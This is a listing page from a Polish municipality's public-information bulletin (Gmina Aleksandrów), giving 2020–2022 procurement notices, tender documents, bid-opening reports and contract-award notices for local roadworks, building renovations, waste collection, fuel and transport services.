Załacznik 9 Opis przedmiotu zamówienia

Załącznik 10 ID postępowania

Załącznik nr 2 do OPZ

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-02-16 14:59:43 | Data modyfikacji: 2022-02-24 11:54:07.
Ogłoszenie o przetargu - Remont dachu na budynku
użyteczności publicznej w miejscowości
Niewierszyn

Ogłoszenie o przetargu do pobrania tutaj >>

Specyfikacja Warunków Zamówienia >>

Załącznik Nr 1 do SWZ - formularz ofertowy

Załącznik Nr 2 do SWZ - warunki udziału

Załącznik Nr 3 do SWZ - przesłanki do wykluczenia

Załącznik Nr 4 do SWZ - oświadczenie o nie przynalezności do grupy kapitałowej

Załącznik Nr 5 do SWZ - wykaz osób

Załacznik Nr 6 do SWZ - oświadczenie o aktualności

Załacznik Nr 7 do SWZ - projekt umowy

Załącznik Nr 8 do SWZ - dokumentacja projektowa

Załącznik Nr 9 do SWZ - przedmiar robót

Załącznik Nr 10 do SWZ - specyfikacja techniczna

Załącznik Nr 11 do SWZ - ID postępowania

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-02-14 15:01:16 | Data modyfikacji: 2022-02-24 11:54:07.
Zapytanie ofertowe - usługa koparko ładowarką
oraz samochodem samowyładowczym

Zapytanie o usługi koparką do pobrania tutaj >>

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-02-08 10:48:02 | Data modyfikacji: 2022-02-24 11:54:07.
Zapytanie ofertowe - dostawa kruszywa drogowego
dolomitowo-weglanowego o frakcji 0-31,5 mm na
teren gminy Aleksandrów

Zapytanie dot kruszywa 0-31,5 do pobrania tutaj >>

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-02-08 10:42:29 | Data modyfikacji: 2022-02-24 11:54:07.
Zapytanie ofertowe - dostawa kruszywa drogowego
dolomitowo-weglanowego o frakcji 0-63 mm na teren
gminy Aleksandrów

Zapytanie dot kruszywa 0-63 do pobrania tutaj >>

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-02-08 10:38:28 | Data modyfikacji: 2022-02-08 10:43:11.
Plan postępowań o udzielenie zamówień na rok
2022
 
Plan postępowań do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-01-28 15:54:32 | Data modyfikacji: 2022-02-08 10:43:11.
Odpowiedź do zapytania ofertowego - opracowanie
dokumentacji Programu Funkcjonalno-Użytkowego dla
projegku realizowaneog w ramach Rządowego
Funduszu Polski Ład Program Inwestycji
Strategicznych na realizację zadania
inwestycyjnego pn. "Budowa i modernizacja
infrastruktury drogowej na terenie gminy
Aleksandrów"
 
Odpowiedź do zapytania do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-01-28 12:22:05 | Data modyfikacji: 2022-02-08 10:43:11.
Zapytanie ofertowe - opracowanie dokumentacji
Programu Funkcjonalno-Użytkowego dla projegku
realizowaneog w ramach Rządowego Funduszu Polski
Ład Program Inwestycji Strategicznych na
realizację zadania inwestycyjnego pn. "Budowa
nowego ujęcia wody wraz z modernizacją ujęć
istniejących celem zapewnienia wody dla
mieszkańców gminy Aleksandrów"
 
Zapytanie ofertowe dotyczące dokmentacji ujęcia wody do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-01-26 14:17:50 | Data modyfikacji: 2022-02-08 10:43:11.
Zapytanie ofertowe - opracowanie dokumentacji
Programu Funkcjonalno-Użytkowego dla projegku
realizowaneog w ramach Rządowego Funduszu Polski
Ład Program Inwestycji Strategicznych na
realizację zadania inwestycyjnego pn. "Budowa i
modernizacja infrastruktury drogowej na terenie
gminy Aleksandrów"
 
Zapytanie dotyczące dokumentacji dorgi do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-01-26 14:12:32 | Data modyfikacji: 2022-01-26 14:21:09.
Sprostowanie do zawiadomienia o wyborze
najkorzystniejszej oferty - Termomodernizacja
budynku użyteczności publicznej w Niewierszynie
- zaspokojenie potrzeb mieszkaniowych wspólnoty
samorządowej
 
Sprostowanie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-01-25 15:23:43 | Data modyfikacji: 2022-01-26 14:21:09.
Zawiadomienie o wyborze najkorzystniejszej oferty
- termomodernizacja budnyku użyteczności
publicznej w Niewierszynie - zaspokojenie potrzeb
mieszkaniowych wspólnoty samorządowej
 
Zawiadomienie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-01-21 14:22:05 | Data modyfikacji: 2022-01-21 14:55:45.
Plan postępowań o udzielenie zamówień na 2022
rok
 
Plan postępowań do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-01-18 11:45:31 | Data modyfikacji: 2022-01-21 14:55:45.
Zapytanie ofertowe - Zakup paliw płynnych
 
Zapytanie dobyczące paliw do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-12-29 08:37:39 | Data modyfikacji: 2022-01-21 14:55:45.
Zapytanie ofertowe - Zapewnienie całodobowej
gotowości do podjęcia działań związanych z
opieką weterynaryjną w przypadkach zdarzeń
drogowych z udziałem zwierząt na terenie Gminy
Aleksandrów
 
Zapytanie dotyczące opieki weterynaryjnej do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-12-28 15:45:51 | Data modyfikacji: 2022-01-21 14:55:45.
Zapytanie ofertowe na konserwację oświetlenia
ulicznego
 
Zapytanie ofertowe do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2021-12-14 14:15:02 | Data modyfikacji: 2022-01-21 14:55:45.
Zapytanie ofertowe na zimowe utrzymanie dróg
 
Zapytanie ofertowe do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2021-12-14 14:14:24 | Data modyfikacji: 2022-01-21 14:55:45.
Informacja z otwarcia ofert- ,,Termomodernizacja
budynku użyteczności publicznej w
Niewierszynie-zaspokojenie potrzeb mieszkaniowych
wspólnoty samorządowej"
 
Informacja do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2021-11-25 14:22:45 | Data modyfikacji: 2022-01-21 14:55:45.
Informacja o kwocie - Termomodernizacja budynku
użyteczności publicznej w Niewierszynie-
zaspokojenie potrzeb mieszkaniowych wspólnoty
samorządowej
 
Informacja o kwoce do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-11-25 11:28:02 | Data modyfikacji: 2022-01-21 14:55:45.
Wyjaśnienie treści SWZ - Termomodernizacja
budynku użyteczności publiczenej w
Nierwierszynie - zaspokojenie potrzeb
mieszkaniowych wspólnoty samorządowej
 
Wyjasnienie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-11-23 15:55:37 | Data modyfikacji: 2022-01-21 14:55:45.
Ogłoszenie o zamówieniu - Termomodernizacja
budynku użyteczności publiczenej w
Nierwierszynie - zaspokojenie potrzeb
mieszkaniowych wspólnoty samorządowej

Ogłoszenie o zamówieniu

Specyfikacja Warunków Zamówienia

Załącznik nr 1 do SWZ - formularz_ofertowy

Załącznik nr 1a do SWZ - kosztorys ofertowy

Załącznik nr 2 do SWZ - oświadczenie warunku udziału

Załącznik nr 3 do SWZ - oświadczenie warunki wykluczenia

Załącznik nr 4 do SWZ - grupa kapitałowa

Załącznik nr 5 do SWZ - wykaz osób

Załącznik nr 6 do SWZ - wzór oświadczenia o aktualności

Załącznik nr 7 do SWZ - umowa

Załącznik nr 8

Załącznik nr 9

Załącznik nr 10

Załącznik nr 11

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-11-05 15:01:34 | Data modyfikacji: 2022-01-21 14:55:45.
Plan postępowań o udzielenie zamówień na rok
2021
 
Plan postępowań do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-11-02 14:35:29 | Data modyfikacji: 2022-01-21 14:55:45.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Rozbiórka budynku Ochotniczej Straży Pozarnej
w miejscowości Szarbsko
 
Zawiadomienie o wyborze oferty do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-10-19 15:31:01 | Data modyfikacji: 2022-01-21 14:55:45.
Zawiadomienie o wyborze najkorzystniejszej oferty
- „Remont (przebudowa) poboczy przy drodze w
miejscowości Janikowice”
 
Zawiadomienie do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2021-10-15 10:53:08 | Data modyfikacji: 2021-10-15 10:53:50.
Zawiadomienie o wyborze najkorzystniejszej
oferty-,,Zagospodarowanie centrum miejscowości
Ciechomin poprzez budowę infrastruktury
rekreacyjno-sportowej"
 
Zawiadomienie do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2021-09-27 14:35:26 | Data modyfikacji: 2021-10-15 10:53:50.
Informacja z otwarcia ofert- ,,Remont (przebudowa)
poboczy przy drodze w miejscowości Janikowice"
 
Informacja do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2021-09-27 13:11:07 | Data modyfikacji: 2021-10-15 10:53:50.
Informacja o kwocie jaką zamierza przeznaczyć
Zamawiający- ,,Remont ( przebudowa) poboczy przy
drodze w miejscowości Janikowice"
 
Informacja do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2021-09-27 12:15:23 | Data modyfikacji: 2021-10-15 10:53:50.
Informacja z otwarcia ofert - Rozbiórka budynku
Ochotniczej Straży Pożarnej w miejscowości
Szarbsko
 
Informacja z otwarcia ofert do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-09-24 14:51:03 | Data modyfikacji: 2021-10-15 10:53:50.
Infromacja o kwocie jaką zamierza przeznaczyć
Zamawiajacy na sfinansowanie zamówienia-
Rozbiórka budynku Ochotniczej Straży Pożarnej w
miejscowości Szarbsko
 
Informacja o kwocie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-09-24 11:28:14 | Data modyfikacji: 2021-10-15 10:53:50.
Wyjasnienie treści SWZ - Remont (przebudowa)
poboczy przy drodze w miejscowości Janikowice
 
Wyjaśnienie SWZ do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-09-23 15:47:30 | Data modyfikacji: 2021-10-15 10:53:50.
Wykaz nieruchomości przeznaczonych do dzierżawy
 
Wykaz do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-09-14 09:27:00 | Data modyfikacji: 2021-10-15 10:53:50.
Ogłoszenie o zamówieniu- ,,Remont( przebudowa)
poboczy przy drodze w miejscowości Janikowice"

Ogłoszenie o zamówieniu

SWZ

Załącznik nr 1 do SWZ- Formularz ofertowy

Załącznik nr 2- oświadczenie o spełnieniu warunków

Załącznik nr 3- wzór oświadczenia o braku podstaw do wykluczenia

Załącznik nr 4- grupa kapitałowa

Załącznik nr 5- wzór umowy

Załącznik nr 6- wzór oświadczenia o aktualności

Załącznik nr 7- dokumentacja projektowa

Załącznik nr 8- przedmiar robót

Załącznik nr 9- STWIOR

Załącznik nr 10- ID postępowania

 

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2021-09-10 13:51:37 | Data modyfikacji: 2021-09-10 14:16:43.
Ogłoszenie o zamówieniu - Rozbiórka budynku
Ochotniczej Straży Pożarnej w miejscowości
Szarbsko

Ogłoszenie o zamówieniu

Specyfikacja Warunków Zamówienia

Załącznik Nr 1 do SWZ - wzór Formularza Ofertowego

Załącznik Nr 2 do SWZ - wzór oświadczenia o spełnianiu warunków udziału w postępowaniu

Załącznik Nr 3 do SWZ - wzór oświadczenia o braku podstaw do wykluczenia

Załacznik Nr 4 do SWZ - wzór informacji, że wykonawca nie należy do grupy kapitałowej

Załącznik Nr 5 do SWZ - wzór umowy

Załącznik Nr 6 - wzór wykazu osób

Załącznik Nr 7 do SWZ - wzór oświadczenia o aktualności

Załącznik Nr 8 do SWZ - dokumentacja projektowa

Załącznik Nr 9 do SWZ - przedmiar

Załącznik Nr 10 do SWZ - specyfikacja techniczna

Załącznik Nr 11 do SWZ - ID postępowania

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-09-09 13:28:45 | Data modyfikacji: 2021-09-10 14:16:43.
Aktuazliacja planu postępowań o udzielenie
zamówień na rok 2021
 
Akutalizacja planu do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-09-07 12:15:43 | Data modyfikacji: 2021-09-10 14:16:43.
Informacja z otwarcia ofert - Zagospodarowanie
centrum miejscowości Ciechomin poprzez budowę
infrastruktury rekreacyjno-sportowej
 
Informacja z otwarcia ofert do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-09-02 13:13:52 | Data modyfikacji: 2021-09-10 14:16:43.
Informacja o kwocie jaką zamierza przeznaczyć
Zamawiający - Zagospodarowanie miejscowości
Ciechomin poprzez budowę infrastrukury
rekreacyjno-sportowej
 
Informacja do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-09-02 11:34:26 | Data modyfikacji: 2021-09-02 11:38:32.
Wyjaśnienie treści SWZ- ,,Zagospodarowanie
centrum miejscowości Ciechomin poprzez budowę
infrastruktury rekreacyjno-sportowej"
 
Wyjaśnienie do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2021-08-26 15:33:01 | Data modyfikacji: 2021-09-02 11:38:32.
Ogłoszenie o zamówieniu - Zagospodarowanie
miejscowości Ciechomin poprzez budowę
infrastrukury rekreacyjno-sportowej

Ogłoszenie o zamówieniu

SWZ

Załącznik nr 1 - wzór formularza ofertowego

Załącznik nr 2 - wzór oświadczenia o spełnianiu warunków udziału w postępowaniu

Załącznik nr 3 - wzór oświadczenia o braku podstaw do wykluczenia

Załącznik nr 4 - wzór informacji o przynależności do grupy kapitałowej

Załącznik nr 5 - wzór umowy

Załącznik nr 6 - wzór oświadczenia o aktualności

Załącznik nr 7 - opis techniczny

Załącznik nr 8 - przedmiar robót

Załącznik nr 9 - specyfikacja techniczna

Załącznik nr 10 - link

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-08-17 14:04:22 | Data modyfikacji: 2021-09-02 11:38:32.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Rozbudowa i nadbudowa budynku strażnicy
Ochotniczej Straży Pożarnej w miejscowości
Dąbrowa nad Czarną
 
Zawiadomienie o wyborze oferty na remont budynku do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-08-02 15:09:37 | Data modyfikacji: 2021-09-02 11:38:32.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Remont drogi powiatowej Nr DP 1502E Sulejów-
Kawęczyn- Krasik
 
Zawiadomienie o wyborze oferty na remont drogi do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-08-02 15:05:50 | Data modyfikacji: 2021-09-02 11:38:32.
Przedłużenie terminu składania ofert -
Realizacja dowozu wraz z zakupem biletów
miesięcznych dla uczniów dojeżdżających do
szkół na terenie Gminy Aleksandrów w roku
szkolnym 2021/2022
 
Przedłużenie terminu składania ofert do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-07-29 09:07:39 | Data modyfikacji: 2021-09-02 11:38:32.
Informacja - dotycząca Realizacji dowozu wraz z
zakupem biletów miesięcznych dla uczniów
dojeżdżających do szkół na terenie Gminy
Aleksandrów
 
Informacja do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-07-29 09:05:54 | Data modyfikacji: 2021-09-02 11:38:32.
Zapytanie ofertowe - Realizacja dowozu wraz z
zakupem biletów miesięcznych dla uczniów
dojeżdżających do szkół na terenie Gminy
Aleksandrów w roku szkolnym 2021/2022

Zapytanie ofertowe

Formularz ofertowy

Wykaz ilościowy uczniów

Zestawienie cen jednostkowych

Plan tras

Wykaz sprzętu

Wykaz usług

Projekt umowy

Oświadczenie RODO

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-07-26 13:32:40 | Data modyfikacji: 2021-09-02 11:38:32.
Informacja z otwarcia ofert - Rozbudowa i
nadbudowa budynku strażnicy Ochotniczej Straży
Pożarnej w miejscowości Dąbrowa nad Czarną
 
Informacja z otwarcia ofert do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-07-16 13:46:50 | Data modyfikacji: 2021-09-02 11:38:32.
Informacja o kwoce jaką zamierza przeznaczyć
Zamawiający na sfinansowanie zamówienia -
Rozbudowa i nadbudowa budynku strażnicy
Ochotniczej Straży Pożarnej w miejsocwości
Dąbrowa nad Czarną
 
Informacja do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-07-16 11:17:55 | Data modyfikacji: 2021-09-02 11:38:32.
Informacja z otwarcia ofert - Remont drogi
powiatowej Nr DP 1502E Sulejów - Kawęczyn -
Krasik
 
Informacja z otwarcia ofert do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-07-15 14:16:02 | Data modyfikacji: 2021-09-02 11:38:32.
Informacja o kwocie jaką zamierza przeznaczyć
Zamawiający na sfinansowanie zamówienia -Remont
drogi powiatowej Nr DP 1502E
Sulejów-Kawęczyn-Krasik
 
Informacja do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-07-15 11:39:40 | Data modyfikacji: 2021-07-15 11:40:16.
Wyjaśnienie treści SWZ - Remont drogi powiatowej
Nr DP 1502E Sulejów-Kawęczyn-Krasik
 
Wyjsaśnienie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-07-09 15:22:54 | Data modyfikacji: 2021-07-09 15:24:37.
Zmiana treści SWZ: Rozbudowa i nadbudowa budynku
strażnicy Ochotniczej Straży Pożarnej w
miejscowości Dąbrowa nad Czarną

Zmiana SWZ

Załącznik nr 1 do SWZ - wzór formularza ofertowego

Załącznik nr 7 do SWZ

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-07-07 14:58:55 | Data modyfikacji: 2021-07-09 15:24:37.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Remont (przebudowa) drogi w miejscowości
Reczków Nowy
 
Zawiadomienie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-07-05 13:28:08 | Data modyfikacji: 2021-07-05 13:28:43.
Ogłoszenie o zamówieniu - Rozbudowa i nadbudowa
budynku strażnicy Ochotniczej Straży Pożarnej w
miejscowości Dąbrowa nad Czarną

Ogłoszenie o zamówieniu

Specyfikacja Warunków Zamówienia

Załącznik nr 1 do SWZ- wzór formularza ofertowego

Załącznik nr 2 do SWZ - wzór oświadczenia o spełnianiu warunków udziału w postępowaniu

Załącznik nr 3 do SWZ - wzór oświadczenia o braku podstaw do wykluczenia

Załącznik nr 4 do SWZ - wzór informacji że wykonawca nie należy do grupy kapitałowej

Załącznik nr 5 do SWZ-wzór wykazu osób

Załącznik nr 6 do SWZ- wzór wykazu robót

Załącznik nr 7 do SWZ- wzór umowy

Załącznik nr 8 do SWZ - dokumentacja projektowa.

Załącznik nr 9 do SWZ - przedmiar robót

Załącznik nr 10 do SWZ - STWiOR

Załącznik nr 11

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-07-01 17:50:25 | Data modyfikacji: 2021-07-05 13:28:43.
Plan postępowań o udzielenie zamówień na rok
2021
 
Plan postępowań do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2021-07-01 15:23:59 | Data modyfikacji: 2021-07-05 13:28:43.
Plan postępowań o udzielenie zamówień na rok
2021
 
Plan postępowań do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2021-07-01 15:22:27 | Data modyfikacji: 2021-07-05 13:28:43.
Ogłoszenie o zamówieniu - Remont drogi
powiatowej Nr DP 1502E Sulejów-Kawęczyn-Krasik

Ogłoszenie o zamówieniu

Specyfikacja Warunków Zamówienia

Załącznik nr 1 do SWZ - wzór formularza ofertowego

Załącznik Nr 2 do SWZ - wzór oświadczenia o spełnianiu warunków

Załącznik Nr 3 do SWZ - wzór oświadczenia o braku podstaw do wykluczenia

Załącznik Nr 4 do SWZ - wzór informacji o grupie kapitałowej

Załącznik Nr 5 do SWZ - wzór wykazu osób

Załącznik Nr 6 do SWZ - wzór wykazu robót

Załącznik Nr 7 do SWZ - wzór umowy

Załącznik Nr 8 do SWZ

Załącznik Nr 9 do SWZ

Załącznik Nr 10 do SWZ

Załącznik Nr 11 do SWZ

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-06-30 14:54:19 | Data modyfikacji: 2021-07-05 13:28:43.
Plan postępowań o udzielenie zamówień na rok
2021
 
Plan postepowań do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-06-29 09:53:22 | Data modyfikacji: 2021-06-29 09:53:52.
Informacja z otwarcia ofert -Remont (przebudowa)
drogi w miejscowości Reczków Nowy
 
Informacja do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2021-06-17 15:55:23 | Data modyfikacji: 2021-06-29 09:53:52.
Informacja o kwocie jaką zamierza przeznaczyć
Zamawiający na sfinansowanie zamówienia- Remont
(przebudowa) drogi w miejscowości Reczków Nowy
 
Informacja do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2021-06-17 11:17:16 | Data modyfikacji: 2021-06-29 09:53:52.
Ogłoszenie o zamówieniu - Remont (przebudowa)
drogi w miejscowości Reczków Nowy

Ogłoszenie o zamówieniu

SWZ

Załącznik nr 1 do SWZ - wzór formularza ofertowego

Załącznik nr 2 do SWZ - wzór oświadczenia o spełnianiu warunków udziału w postępowaniu

Załącznik nr 3 do SWZ - wzór oświadczenia o braku podstaw do wykluczenia

Załącznik nr 4 do SWZ - wzór informacji że wykonawca nie należy do grupy kapitałowej

Załącznik nr 5 do SWZ - wzór wykazu osób

Załącznik nr 6 do SWZ - wzór wykazu robót

Załącznik nr 7 do SWZ - wzór umowy

Załącznik nr 8 do SWZ - dokumentacja projektowa

Załącznik nr 9 do SWZ - przedmiar robót

Załącznik nr 10 do SWZ - STWiOR

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-06-02 17:35:50 | Data modyfikacji: 2021-06-29 09:53:52.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Remont drogi w miejscowości Borowiec (Górka)
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-06-02 14:38:54 | Data modyfikacji: 2021-06-02 14:42:26.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Odbiór i zagospodarowanie odpadów komunalnych
z terenu gminy Aleksandrów
 
Zawiadomienie o wyborze najkorzystniejszej oferty do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-05-25 13:24:57 | Data modyfikacji: 2021-06-02 14:42:26.
Informacja z otwarcia ofert - Remont drogi w
miejscowości Borowiec (Górka)
 
Informacja z otwarcia ofert do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-05-17 14:08:49 | Data modyfikacji: 2021-06-02 14:42:26.
Informacja o kwocie jaką zamierza przeznaczyć
Zamawiający na sfinansowanie zamówienia - Remont
drogi w miejscowości Borowiec (Górka)
 
Informacja o kwocie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-05-17 11:21:25 | Data modyfikacji: 2021-06-02 14:42:26.
Informacja z otwarcia ofert postępowania o
udzielenie zamówienia publicznego pn.: ,,Odbiór
i zagospodarowanie odpadów komunalnych z terenu
Gminy Aleksandrów”
 
Informacja z otwarcia ofert do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2021-05-13 15:33:00 | Data modyfikacji: 2021-06-02 14:42:26.
Informacja o kwocie, jaką zamierza przeznaczyć
Gmina Aleksandrów na sfinansowanie zamówienia
pn.;"Odbiór i zagospodarowanie odpadów
komunalnych z terenu Gminy Aleksandrów”
 
Informacja o kwocie do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2021-05-13 11:44:36 | Data modyfikacji: 2021-06-02 14:42:26.
Ogłoszenie o zmianie ogłoszenia i odpowiedz na
pytania - Odbiór i zagospodarowanie odpadów
komunalnych z terenu Gminy Aleksandrów

Odpowiedzi na zapytania

Ogłoszenie o zmianach ogłoszenia

SWZ po zmianach

Załącznik nr 2 do SWZ po zmianach

Załącznik nr 7 do SWZ po zmianach

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-05-10 20:30:04 | Data modyfikacji: 2021-06-02 14:42:26.
Ogłoszenie o zamówieniu - Odbiór i
zagospodarowanie odpadów komunalnych z terenu
Gminy Aleksandrów

Ogłoszenie o zamówieniu

Specyfikacja Warunków Zamówienia

Załącznik Nr 1 do SWZ - Szczegółowy Opis Przedmiotu Zamówienia

Załącznik Nr 2 do SWZ - wzór Formularza Ofertowego

Załącznik Nr 3 so SWZ - wzór oświadczenia o spełnieniu warunków

Załącznik Nr 4 do SWZ - wzór oświadczenia o braku podstaw do wykluczenia

Załacznik Nr 5 do SWZ - Wzór informacji że wykonawca należy do grupy kapitałowej

Załacznik nr 6 do SWZ - wzór wykazu narzędzi

Załacznik Nr 7 do SWZ - Istotne Postanowienia Umowy

Załącznik Nr 8 do SWZ - Uchwała Nr XIV/104/2020

Załacznik Nr 9 do SWZ - Uchwała Nr XIV/106/2020

Załącznik Nr 10

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-04-30 16:12:49 | Data modyfikacji: 2021-06-02 14:42:26.
Ogloszenie o zamówieniu - Remont drogi w
miejscowości Borowiec (Górka)

Ogłoszenie o zamówieniu

Specyfikacja Warunków Zamówienia

Załącznik nr 1 - wzór Formularza Ofertowego

Załącznik Nr 2 - wzór oświadczenia o spełnieniu warunków

Załącznik nr 3 - wzór oświadczenia o braku podstaw do wykluczenia

Załącznik Nr 4 - wzór informacji że wykonawca nie należy do grupy kapitałowej

Załącznik Nr 5 -Wzór wykazu osób

Załącznik Nr 6 - wzór wykazu robót

Załącznik Nr 7 - wzór umowy

Załącznik Nr 8

Załącznik Nr 9

Załacznik Nr 10

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-04-30 15:27:13 | Data modyfikacji: 2021-06-02 14:42:26.
Plan postępowań o udzielenie zamówień na rok
2021
 
Plan postępowań do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-04-20 17:07:56 | Data modyfikacji: 2021-06-02 14:42:26.
Zapytanie ofertowe o cenę usługi koparko -
ładowarką oraz samochodem samowyładowczym
 
Zapytanie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-04-06 15:22:22 | Data modyfikacji: 2021-06-02 14:42:26.
Ogłoszenie o przetargu na sprzedaz samochodu
 
Ogloszenie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-02-22 14:00:40 | Data modyfikacji: 2021-06-02 14:42:26.
Zapytanie ofertowe o cenę wykonania usługi
usuwania odpadów z folii rolniczych, siatki i
sznurka do owijania balotów, opakowań po
nawozach i typu Big Bag
 
Zapytanie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-01-27 09:44:58 | Data modyfikacji: 2021-01-27 09:45:35.
Plan postępowań o udzielenie zamówień na rok
2021

Plan postępowań do pobrania tutaj >>

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-01-26 09:05:03 | Data modyfikacji: 2021-01-27 09:45:35.
Zapytanie ofertowe na dowóz dzieci
niepełnosprawnych z Gminy Aleksandrów w roku
2021

Zapytanie do pobrania tutaj >>

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2021-01-07 15:29:49 | Data modyfikacji: 2021-01-27 09:45:35.
Zapytanie ofertowe - zakup paliw płynnych dla OSP
 
Zapytanie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-12-23 12:07:35 | Data modyfikacji: 2021-01-27 09:45:35.
Zawiadomienie o wyborze najkorzystniejszej oferty-
Zakup pojazdu przeznaczonego do przewozu
uczestników na zajęcia
terapeutyczno-rehabilitacyjne w Środowiskowym
Domu Samopomocy w Dąbrówce gm. Aleksandrów
 
Zawiadomienie do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2020-12-15 14:53:46 | Data modyfikacji: 2020-12-15 15:07:55.
Zapytanie o cenę "Usługi konserwacji
oświetlenia ulicznego na terenie Gminy
Aleksandrów w 2021 roku"
 
Zapytanie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-12-15 10:50:50 | Data modyfikacji: 2020-12-15 15:07:55.
Zapytanie o cenę - Zimowe utrzymanie dróg na
terenie Gminy Aleksandrów w 2021 roku
 
Zapytanie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-12-14 15:18:40 | Data modyfikacji: 2020-12-15 15:07:55.
Informacja z otwarcia ofert - Zakup pojazdu
przeznaczonego do przewozu uczestników na
zajęcia terapeutyczno-rehabilitacyjne w
Środowiskowym Domu Samopomocy w Dąbrówce gm.
Aleksandrów
 
Informacja do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-12-09 10:32:33 | Data modyfikacji: 2020-12-15 15:07:55.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Dostawa oleju opałowego dla Urzędu Gminy,
